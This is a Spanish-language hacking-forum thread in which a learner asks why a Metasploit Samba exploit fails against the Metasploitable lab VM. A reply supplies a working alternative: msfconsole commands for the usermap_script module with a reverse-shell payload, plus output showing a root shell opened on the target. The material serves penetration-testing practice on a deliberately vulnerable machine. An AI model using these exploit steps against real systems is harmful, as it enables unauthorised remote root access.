Test Foro de elhacker.net SMF 2.1

Seguridad Informática => Hacking => Mensaje iniciado por: CATBro en 28 Junio 2012, 05:04 AM

Título: Prueba de nessus,metasploits, y vm metasploitable Algo no hago bien???
Publicado por: CATBro en 28 Junio 2012, 05:04 AM
Que tal ando aprendiendo a usar nessu,metasploits y varias cosas mas en fin, corri el nessus contra la maquina virtual que difunde rapid7 creo( metasploitable ) un resultado de nessus me dice lo siguiente:
CVE 2007-2446
La version de servidor samba de la maquina objetivo es vulnerable a un ataque de desbordamiento de buffer, y en el reporte me dice cual exploit usar con metasploits , entonces
tecleo:

#msfconsole
msf  use exploit/linux/samba/lsa_transnames_heap
msf  exploit(lsa_transnames_heap) > set RHOST X.X:X:.X
msf  exploit(lsa_transnames_heap) > set PAYLOAD linux/x86/exec
msf  exploit(lsa_transnames_heap) > set CMD ifconfig
msf  exploit(lsa_transnames_heap) > show options

Module options (exploit/linux/samba/lsa_transnames_heap):

   Name     Current Setting  Required  Description
   ----            ---------------  --------  -----------
   RHOST     192.168.1.107    yes       The target address
   RPORT      445                     yes       Set the SMB service port
   SMBPIPE   LSARPC              yes       The pipe name to use


Payload options (linux/x86/exec):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------
   CMD   ifconfig         yes       The command string to execute


Exploit target:

   Id  Name
   --  ----
   0   Linux vsyscall

msf  exploit(lsa_transnames_heap) > exploit

Título: Re: Prueba de nessus,metasploits, y vm metasploitable Algo no hago bien???
Publicado por: adastra en 28 Junio 2012, 09:17 AM
 El problema esta en el exploit que estas tratando de usar:


msf > use exploit/multi/samba/usermap_script
msf exploit(usermap_script) > show options
Module options (exploit/multi/samba/usermap_script):Name Current Setting Required Description
—- ————— ——– ———–
RHOST 192.168.1.34 yes The target address
RPORT 445 yes The target port
Exploit target:
Id Name
– —-
0 Automatic
msf exploit(usermap_script) > set PAYLOAD cmd/unix/reverse
PAYLOAD => cmd/unix/reverse
msf exploit(usermap_script) > set LHOST 192.168.1.33
LHOST => 192.168.1.33
msf exploit(usermap_script) > exploit
  • Started reverse double handler
  • Accepted the first client connection...
  • Accepted the second client connection...
  • Command: echo rm6wOwiDrg4PM9Ug;
  • Writing to socket A
  • Writing to socket B
  • Reading from sockets...
  • Reading from socket B
  • B: "rm6wOwiDrg4PM9Ug\r\n"
  • Matching...
  • A is input...
  • Command shell session 4 opened (192.168.1.33:4444 -> 192.168.1.34:53107) at Wed May 18 00:40:18 +0200 2011
    uname -r
    2.6.24-16-server
    whoami
    root

Hace algunos meses escribí una serie de publicaciones sobre como explotar las vulnerabilidades que vienen incluidas en Metasploitable. La primera parte comienza aquí:


http://thehackerway.com/2011/06/17/penetrando-sistemas-bajo-plataforma-gnulinux-vulnerable-con-metasploit-framework-parte-i/


Por si te interesa conocer un poco más sobre como atacar una plataforma vulnerable.
Un Saludo.




Título: Re: Prueba de nessus,metasploits, y vm metasploitable Algo no hago bien???
Publicado por: CATBro en 28 Junio 2012, 23:03 PM
Llegando a mi casa lo pruebo tambien para leer los tutos que has hecho.
Ya mas comento que paso

Saludos 
Título: Re: Prueba de nessus,metasploits, y vm metasploitable Algo no hago bien???
Publicado por: CATBro en 29 Junio 2012, 03:56 AM
Que tal adastra probe el exploit que me diste funciono muchas gracias pero porque nessus me da uno y no funciona ?? viendo las opciones del exploit que me diste me daba en el puerto de destino el 139 que venia por default, y funciono?? luego lo cale con el 445 y tambien , al googlear sobre ese puerto 445 al parecer hay algun tipo de vulnerabilidad a explotar le investigare bien ya despues comento que encontre.Yo pensaba que samba corria en los puertos 137 a 139 pero no entiendo el 445
Otra cosa ando usando el metasploits pero cuando le doy
> search telnet o cualquie cosa no me da ningun resultado la busqueda porque??
Saludos